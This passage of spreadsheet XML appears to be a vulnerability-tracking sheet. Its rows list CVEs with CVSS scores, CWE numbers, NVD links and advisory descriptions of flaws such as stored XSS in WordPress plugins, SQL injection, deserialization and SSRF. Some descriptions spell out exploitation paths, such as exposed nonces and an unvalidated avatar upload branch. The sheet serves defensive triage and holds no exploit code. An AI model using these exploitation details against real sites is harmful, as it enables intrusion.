      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to insecure deserialization in the Quartz JDBC job store. An authenticated attacker could exploit this vulnerability to execute arbitrary code on the affected system.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84862</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85750</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Piwigo before v16.4.0 is vulnerable to arbitrary file read and remote code execution in image upload handling when using the Imagick library due to insufficient validation and unsafe processing of user-supplied image files. By abusing format confusion (e.g., disguising SVG content as PNG), an attacker can trigger unintended interpretation of embedded SVG elements that reference local files. In more advanced scenarios, the Imagick support for Magick Scripting Language (MSL) may be abused to process attacker-controlled instructions, potentially leading to unauthorized server-side file writes and remote code execution, depending on configuration. This has been patched in 16.4.0.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85750</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93303</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via 'form_data' Rich Text Field via Draft Save/Resume in all versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires tricking a user into clicking an attacker-supplied draft resume URL, which the attacker constructs using the draft_key and access_token returned directly in the save response.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93303</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93654</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'cart_items[][product_name]' Parameter in all versions up to, and including, 7.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The checkout REST route uses permission_callback set to __return_true and the invoice loader performs no order ownership check, meaning an unauthenticated attacker can both persist the payload and ensure it is renderable to any logged-in user who accesses the invoice.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93654</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94573</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Elementor Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Field Value in all versions up to, and including, 2.2.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94573</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95864</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>The Themify Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'css[fonts]' Parameter in all versions up to, and including, 7.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce required to reach the vulnerable endpoint is embedded in plain sight within the front-end page markup for all visitors, reducing the access control to a CSRF token rather than an authentication barrier and making the endpoint fully exploitable by unauthenticated attackers.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95864</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95866</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Avatar Field in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The zero-length multipart file branch in wppb_save_avatar_value() writes the raw request value directly to user meta, bypassing the wppb_save_attachment_id()/wppb_verify_attachment_id() validation path; the stored payload is later adopted as a WordPress attachment URL and rendered unescaped by wppb_default_fields_make_upload_button() when an administrator views the affected account.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95866</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96039</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>The BA Book Everything plugin for WordPress is vulnerable to Stored Cross-Site Scripting via first_name Parameter in all versions up to, and including, 1.8.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An unauthenticated attacker can obtain the valid order_id, order_num, and order_hash credentials required to reach the vulnerable action_to_pay() handler simply by placing a guest booking through the public [babe-booking-form] shortcode, making the full exploit chain reachable without any account.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96039</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96568</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'phone_number' parameter in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96568</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96752</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>The Zero Spam for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Nested POST Array Keys via Contact Form 7 Integration in all versions up to, and including, 5.7.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is delivered by submitting a Contact Form 7 request with a nested POST array key containing arbitrary HTML or JavaScript — PHP parses the field name into a nested array key, which is stored verbatim in the zerospam_log.submission_data column when Zero Spam flags the submission as spam due to the absence of the zerospam_david_walsh_key field.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96752</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97060</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 lacks object-level authorization in user management endpoints, allowing sub-administrators to modify or delete users without ownership verification. Attackers with user-management permissions can reset passwords for any account including the super administrator, rebind roles, or delete users via POST /sys/user/update and POST /sys/user/delete endpoints.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97060</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100555</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed gateway application. In versions &gt;= 2026.7.1 and &lt; 2026.8.1, Synology Chat attachment delivery could lose DNS pinning: the Gateway validated a single DNS result for a supplied file URL but then passed the original hostname to the Synology NAS, where it could resolve to a different destination. When attachment delivery accepted a remotely influenced hostname, an attacker could use DNS rebinding to make the NAS fetch a private or otherwise policy-denied resource and return its contents to the addressed conversation (server-side request forgery). Practical impact depends on NAS routing, resolver behavior, and the response available at the private destination. The issue is fixed in 2026.8.1; as a workaround, disable remote URL attachment forwarding in Synology Chat.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100555</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100598</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.7.1 incorrectly binds Signal approval reactions. In affected versions, a reaction intended to resolve a structured approval request could instead attach to ordinary outbound text when unrelated outbound messages and a pending approval are present in the same conversation. As a result, an approver's reaction to unrelated text could be interpreted as approving or denying a pending host action; the practical impact depends on the pending request, conversation timing, and the actions available to the OpenClaw process. The issue does not change the authority of correctly identified approvers. This is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100598</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53626</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.5 until 11.0.8, under certain conditions, permission logic can grant access to a document without confirming that the document is linked to the targeted item. A user can use an unrelated item that the user is permitted to view to read a document linked to an inaccessible item. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53626</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53629</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 9.4.0 until 10.0.26 and 11.0.8, an attacker with the READ right on logs can craft a URL for the history tab that injects attacker-controlled values into a database query. This permits SQL injection through the history tab endpoint. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53629</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
